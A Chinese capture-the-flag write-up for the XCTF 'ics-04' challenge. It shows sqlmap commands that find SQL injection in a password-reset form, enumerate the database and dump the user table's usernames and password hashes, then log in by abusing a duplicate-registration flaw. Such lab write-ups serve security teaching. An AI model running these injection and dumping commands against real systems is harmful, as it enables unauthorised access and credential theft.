XCTF ics-04

一.进入实验

  1.根据实验的提示,工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。

  看到登录和注册就先试一试sql注入,手工试了半天没什么用,然后想用sqlmap看能不能注入:

  python sqlmap.py -u "http://111.198.29.45:56964/login.php" --data "username=123&password=123" --dbs

  这里没有注入点,也猜到了出题人不可能这么容易让我们拿到flag,,,

  XCTF ics-04

 

    然后我发现这里有个忘记密码,那就点点看了:

  XCTF ics-04

 

 

   这里貌似有SQL注入,那就再用sqlmap跑一下。

  python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" --dbs

  XCTF ics-04

 

   python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 --tables   得到user表

  python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user --columns

  python sqlmap.py -u "http://111.198.29.45:56964/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump

  XCTF ics-04

 

   得到一个我没有注册过的账号,猜测这个应该和flag有关,这个password应该是md5加密过的,试了没能解密成功,但这里不要紧,利用这里的

  同一个用户名可以重复注册的漏洞,去注册一个新的账号,然后登录获得flag。

  XCTF ics-04

 

 

  

  

上一篇:原子引用-AtomicReference


下一篇:[wp] 攻防世界 ics-04